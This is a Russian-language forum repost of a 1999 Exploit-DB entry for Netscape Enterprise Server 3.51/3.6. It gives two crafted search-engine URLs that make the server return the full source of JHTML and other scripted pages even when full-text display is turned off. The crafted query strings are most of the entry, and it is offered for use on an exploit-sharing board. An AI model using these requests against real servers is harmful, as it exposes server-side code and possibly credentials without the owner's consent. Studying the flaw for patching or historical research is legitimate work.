Exploit Netscape Enterprise Server 3.51/3.6 - JHTML View Source

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19443
Проверка EDB
  1. Пройдено
Автор
DAVID LITCHFIELD
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-1999-1130
Дата публикации
1999-07-30
Netscape Enterprise Server 3.51/3.6 - JHTML View Source
Код:
source: https://www.securityfocus.com/bid/559/info

Netscape Enterprise Server 3.51 and above includes a search engine by default. The results it generates can be tailored using various configuration files, and one of the options is whether or not the full text of a resultant page is displayed. This option is turned off by default. However, even with this setting in place, it is possible to construct a specific query that will return the full text of a JHTML page (active content, similar to an IIS .asp page) or other scripted files. 

These example URLs may be wrapped for readability: (copied verbatim from David Litchfield's post to Bugtraq)
h t t p://no-such-server/search?NS-search-page=results&NS-query=A&NS-collection=B&NS-tocrec-pat=/text/HTML-tocrec-demo1.pat
where A is the query e.g. the word "that" and B is the collection e.g. "Web+Publish" or "web_htm".
-OR-
h t t p://no-such-server/search?NS-search-page=document&NS-rel-doc-name=/path/to/indexed/file.jhtml&NS-query=URI!=''&NS-collection=A
where A is the collection without having to go through the rigmarole of playing around with HTML-tocrec-demo1.pat in the URL.
 
Источник
www.exploit-db.com

Похожие темы